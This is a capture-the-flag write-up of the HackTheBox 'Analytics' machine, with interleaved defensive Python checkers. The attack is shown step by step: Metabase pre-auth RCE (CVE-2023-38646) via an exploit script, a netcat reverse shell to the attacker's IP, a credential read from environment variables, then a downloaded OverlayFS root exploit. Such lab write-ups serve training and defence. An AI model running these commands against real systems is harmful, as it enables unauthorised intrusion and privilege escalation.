# HTB — Analytics

Web · Easy · Linux

Metabase pre-auth RCE CVE-2023-38646 via setup token SSRF for shell. Ubuntu OverlayFS CVE-2023-2640 local privilege escalation for root.

January 18, 2025 · HackTheBox

#Metabase #CVE-2023-38646 #OverlayFS #SSRF

## nmap

```sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.10.11.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-18 20:24 EST
Nmap scan report for analytical.htb (10.10.11.233)
Host is up (0.022s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3e:ea:45:4b:c5:d1:6d:6f:e2:d4:d1:3b:0a:3d:a9:4f (ECDSA)
|_ 256 64:cc:75:de:4a:e6:a5:b4:73:eb:3f:1b:cf:b4:e3:94 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Analytical
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=1/18%OT=22%CT=1%CU=33570%PV=Y%DS=2%DC=T%G=Y%TM=678C
OS:5473%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=10D%TI=Z%CI=Z%II=I%TS=A)
OS:OPS(O1=M53CST11NW7%O2=M53CST11NW7%O3=M53CNNT11NW7%O4=M53CST11NW7%O5=M53C
OS:ST11NW7%O6=M53CST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
OS:ECN(R=Y%DF=Y%T=40%W=FAF0%O=M53CNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T
OS:5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=
OS:Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF
OS:=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40
OS:%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 22.10 ms 10.10.14.1
2 22.31 ms analytical.htb (10.10.11.233)
```

## metabase

```sh
curl http://data.analytical.htb/auth/login?redirect=%2F | grep 'version'
```

```sh
,"version":{"date":"2023-06-29","tag":"v0.46.6"
```

Metabase 0.46.6 - Pre-Auth Remote Code Execution
- https://www.exploit-db.com/exploits/51797
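When auditing a Metabase fleet for this bug, the version comparison is better done against the patched release list than by eye. The Python below is an added example (my code, not from this writeup or from the exploit-db script): it pulls the version tag out of a response fragment like the one the curl above returned and compares it with the fixed releases named in Metabase's advisory for CVE-2023-38646. `SAMPLE_BODY` is the fragment from the curl output; the rule that series 47 and later are fixed is my reading of the release timeline (the fix shipped before 0.47.0), and the fixed-version table should be confirmed against the vendor advisory before being relied on.

```python
import re
from typing import Optional, Tuple

# First fixed release per minor series, per the vendor advisory for CVE-2023-38646
# (0.46.6.1 / 1.46.6.1, 0.45.4.1 / 1.45.4.1, 0.44.7.1 / 1.44.7.1, 0.43.7.2 / 1.43.7.2).
# Keyed by series -> (patch, build) of the first fixed release in that series.
# Assumption of this example: verify against the advisory before use.
FIXED_IN = {46: (6, 1), 45: (4, 1), 44: (7, 1), 43: (7, 2)}

# The tag as it appears in the JSON embedded in the login page, e.g. "tag":"v0.46.6"
TAG_RE = re.compile(r'"tag"\s*:\s*"(v\d+(?:\.\d+)*)"')

# Constructed sample: the fragment the grep above returned for this box.
SAMPLE_BODY = ',"version":{"date":"2023-06-29","tag":"v0.46.6"'


def extract_version_tag(body: str) -> Optional[str]:
    """Return the first version tag found in a Metabase HTML/JSON response body."""
    m = TAG_RE.search(body)
    return m.group(1) if m else None


def parse_tag(tag: str) -> Tuple[int, int, int, int]:
    """'v0.46.6' -> (0, 46, 6, 0). Missing trailing components count as 0."""
    parts = [int(p) for p in tag.lstrip("v").split(".")]
    if len(parts) < 2 or len(parts) > 4:
        raise ValueError(f"unexpected Metabase tag: {tag!r}")
    parts += [0] * (4 - len(parts))
    return parts[0], parts[1], parts[2], parts[3]


def is_vulnerable(tag: str) -> bool:
    """True if this Metabase build predates the fix for CVE-2023-38646."""
    edition, series, patch, build = parse_tag(tag)
    if edition not in (0, 1):            # 0 = open source, 1 = enterprise edition
        raise ValueError(f"unexpected Metabase edition in tag: {tag!r}")
    if series >= 47:                     # 0.47 / 1.47 were cut after the fix landed
        return False
    if series not in FIXED_IN:           # older series got no point release: treat as affected
        return True
    return (patch, build) < FIXED_IN[series]


def assess(body: str) -> Tuple[Optional[str], Optional[bool]]:
    """(tag, vulnerable) for a response body; (None, None) if no tag is present."""
    tag = extract_version_tag(body)
    if tag is None:
        return None, None
    return tag, is_vulnerable(tag)


if __name__ == "__main__":
    print(assess(SAMPLE_BODY))   # ('v0.46.6', True)
```

The only real fix is upgrading to a release at or above the listed versions; the build number matters, since 0.46.6 is vulnerable and 0.46.6.1 is not, which is exactly the kind of comparison that gets misread when done by hand.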
```sh
python3 51797.py -l 10.10.14.6 -p 1234 -P 80 -u http://data.analytical.htb/
[*] Exploit script for CVE-2023-38646 [Pre-Auth RCE in Metabase]
[*] Retriving setup token
[+] Setup token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
[*] Tesing if metabase is vulnerable
[+] Starting http server on port 80
[+] Metabase version seems exploitable
[+] Exploiting the server
metabase_shell > whoami
metabase
```

```sh
metabase_shell > busybox nc 10.10.14.6 1235 -e /bin/bash
```

```sh
nc -lnvp 1235
listening on [any] 1235 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.11.233] 37951
whoami
metabase
```

```sh
ls
app
bin
dev
etc
home
lib
media
metabase.db
```

```sh
╔══════════╣ Unexpected in root
/app
/metabase.db
/.dockerenv
/plugins
```

```sh
══╣ Breakout via mounts
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/sensitive-mounts
═╣ /proc mounted? ................. Yes
```

## environment variables
```sh
env
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3551e9fd153d
LANGUAGE=en_US:en
MB_JETTY_HOST=0.0.0.0
JAVA_HOME=/opt/java/openjdk
MB_DB_FILE=//metabase.db/metabase.db
PWD=/metabase.db
LOGNAME=metabase
MB_EMAIL_SMTP_USERNAME=
HOME=/home/metabase
LANG=en_US.UTF-8
META_USER=metalytics
META_PASS=An4lytics_ds20223#
MB_EMAIL_SMTP_PASSWORD=
USER=metabase
SHLVL=5
MB_DB_USER=
FC_LANG=en-US
LD_LIBRARY_PATH=/opt/java/openjdk/lib/server:/opt/java/openjdk/lib:/opt/java/openjdk/../lib
LC_CTYPE=en_US.UTF-8
MB_LDAP_BIND_DN=
LC_ALL=en_US.UTF-8
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
MB_DB_CONNECTION_URI=
JAVA_VERSION=jdk-11.0.19+7
_=/usr/bin/env
OLDPWD=/
```

## creds

metalytics:An4lytics_ds20223#
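The step from container foothold to a real user here is nothing more than reading the process environment: a host account's password was handed to the container as an environment variable. As an added example (my code, not from this writeup), the Python below parses `env`-style output like the listing above and flags credential-named variables that actually hold a value, masking them so the finding can go into a report without copying the secret. `SAMPLE_ENV` is a constructed subset of that listing with the password replaced by a placeholder; the name patterns in `SECRET_NAME` are my choice and will need tuning per environment.

```python
import re
from typing import Dict, List

# Constructed sample: a subset of the container's `env` output above, with the
# real password swapped for a placeholder.
SAMPLE_ENV = """\
SHELL=/bin/sh
MB_DB_PASS=
HOSTNAME=3551e9fd153d
MB_DB_FILE=//metabase.db/metabase.db
META_USER=metalytics
META_PASS=<redacted-password>
MB_EMAIL_SMTP_PASSWORD=
MB_LDAP_BIND_DN=
MB_LDAP_PASSWORD=
PATH=/opt/java/openjdk/bin:/usr/bin
"""

# Variable names that conventionally carry credentials (assumed patterns; extend as needed).
SECRET_NAME = re.compile(r"PASS(WORD)?|PASSWD|SECRET|TOKEN|API_?KEY|PRIVATE_?KEY", re.I)


def parse_env(text: str) -> Dict[str, str]:
    """Turn KEY=VALUE lines into a dict; the first '=' splits, the rest is the value."""
    env: Dict[str, str] = {}
    for line in text.splitlines():
        if "=" not in line:
            continue
        key, _, value = line.partition("=")
        env[key.strip()] = value
    return env


def read_proc_environ(pid: int) -> Dict[str, str]:
    """Same parse for a running process via /proc (Linux; needs same UID or root).
    This is how an auditor checks a live container from the host."""
    with open(f"/proc/{pid}/environ", "rb") as f:
        raw = f.read().decode("utf-8", "replace")
    return parse_env(raw.replace("\0", "\n"))


def find_exposed_secrets(env: Dict[str, str]) -> List[str]:
    """Credential-looking names that hold a non-empty value. Empty ones (such as
    MB_DB_PASS= above) are placeholders defined by the image, not leaks."""
    return sorted(k for k, v in env.items() if SECRET_NAME.search(k) and v.strip())


def mask(value: str) -> str:
    """Keep first/last character as a hint without writing the secret to a log."""
    if len(value) <= 4:
        return "*" * len(value)
    return f"{value[0]}{'*' * (len(value) - 2)}{value[-1]}"


def report(text: str) -> List[str]:
    """One masked line per exposed variable, ready for a findings list."""
    env = parse_env(text)
    return [f"{k}={mask(env[k])} ({len(env[k])} chars)" for k in find_exposed_secrets(env)]


if __name__ == "__main__":
    for line in report(SAMPLE_ENV):
        print(line)
```

Environment variables are inherited by every child process and readable from `/proc/<pid>/environ` by anyone running as the same user, so whoever gets code execution in the container gets them for free. Secrets that have to reach the container are better mounted as files with tight permissions, and a credential used for Metabase's own configuration should never double as a host login.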
## ssh as metalytics

```sh
ssh metalytics@10.10.11.233
The authenticity of host '10.10.11.233 (10.10.11.233)' can't be established.
ED25519 key fingerprint is SHA256:TgNhCKF6jUX7MG8TC01/MUj/+u0EBasUVsdSQMHdyfY.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:174: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.233' (ED25519) to the list of known hosts.
metalytics@10.10.11.233's password: An4lytics_ds20223#
```

## user.txt

```sh
metalytics@analytics:~$ cat user.txt
4a71142a...
```

## priv esc

```sh
metalytics@analytics:/$ uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC Wed Jun 28 09:55:23 UTC 2 x86_64 x86_64 x86_64 GNU/Linux
```

```sh
╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
```

GameOver(lay) Ubuntu Privilege Escalation
- https://github.com/g1vi/CVE-2023-2640-CVE-2023-32629
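From the defender's side the same question is answered from patch data rather than by running a PoC: is this kernel ABI older than the fixed one, and is the unprivileged user-namespace step the public PoC relies on even permitted? The Python below is an added example (my code, not part of this writeup or the linked repository). The patched ABI number 6.2.0-26 for the 6.2 series is what I recall from Ubuntu's USN-6250-1 and is an assumption of this example to be confirmed against the advisory; `kernel.unprivileged_userns_clone` is the Ubuntu-specific sysctl, so the check reports the knob as absent on other distributions.

```python
import platform
import re
from typing import Optional, Tuple

# Patched kernel ABI for the 6.2 series, as recalled from Ubuntu's USN-6250-1 for
# CVE-2023-2640 / CVE-2023-32629. ASSUMPTION of this example: confirm the number
# against the advisory and add other series (5.19, 5.15, ...) from there.
PATCHED_ABI = {(6, 2, 0): 26}

# "6.2.0-25-generic" -> upstream version (6, 2, 0), Ubuntu ABI number 25
UNAME_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)-(\d+)-")


def parse_release(uname_r: str) -> Tuple[Tuple[int, int, int], int]:
    """Split an Ubuntu kernel release string into (upstream version, ABI number)."""
    m = UNAME_RE.match(uname_r)
    if not m:
        raise ValueError(f"not an Ubuntu-style kernel release: {uname_r!r}")
    major, minor, patch, abi = (int(x) for x in m.groups())
    return (major, minor, patch), abi


def kernel_affected(uname_r: str) -> Optional[bool]:
    """True if the ABI predates the fix, False if patched, None if the series is
    not in PATCHED_ABI (look it up in the USN before concluding anything)."""
    series, abi = parse_release(uname_r)
    if series not in PATCHED_ABI:
        return None
    return abi < PATCHED_ABI[series]


def userns_restricted(sysctl_value: Optional[str]) -> bool:
    """Ubuntu's kernel.unprivileged_userns_clone: '0' means unprivileged users
    cannot create user namespaces, which the public PoC needs for its overlay
    mount. None (file absent) means the knob does not exist on this kernel."""
    return sysctl_value is not None and sysctl_value.strip() == "0"


def assess(uname_r: str, sysctl_value: Optional[str]) -> str:
    """Combine both checks into a single verdict for a report."""
    affected = kernel_affected(uname_r)
    if affected is False:
        return "patched"
    if affected is None:
        return "unknown-series"
    return "mitigated-by-sysctl" if userns_restricted(sysctl_value) else "vulnerable"


def assess_live() -> str:
    """Run the checks on the current host (reads /proc, so Linux only)."""
    try:
        with open("/proc/sys/kernel/unprivileged_userns_clone") as f:
            value: Optional[str] = f.read()
    except OSError:
        value = None
    try:
        return assess(platform.release(), value)
    except ValueError:
        return "not-ubuntu-kernel"


if __name__ == "__main__":
    # The kernel from the uname output above, with the sysctl at its default of 1.
    print("6.2.0-25-generic ->", assess("6.2.0-25-generic", "1\n"))
    print("this host ->", assess_live())
```

The verdict for the box's `6.2.0-25-generic` is `vulnerable`; the fix is the kernel update. Setting `kernel.unprivileged_userns_clone=0` is only a stop-gap until the reboot into the patched kernel, and it breaks software that legitimately relies on unprivileged user namespaces (rootless containers, browser sandboxes), so it should be weighed before being rolled out fleet-wide.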
```sh
wget https://raw.githubusercontent.com/g1vi/CVE-2023-2640-CVE-2023-32629/refs/heads/main/exploit.sh
```

```sh
metalytics@analytics:~$ wget http://10.10.14.6:8000/exploit.sh
```

```sh
metalytics@analytics:~$ chmod +x exploit.sh
metalytics@analytics:~$ ./exploit.sh
[+] You should be root now
[+] Type 'exit' to finish and leave the house cleaned
root@analytics:~# whoami
root
```

```sh
root@analytics:/root# cat root.txt
13cbf3e4...
```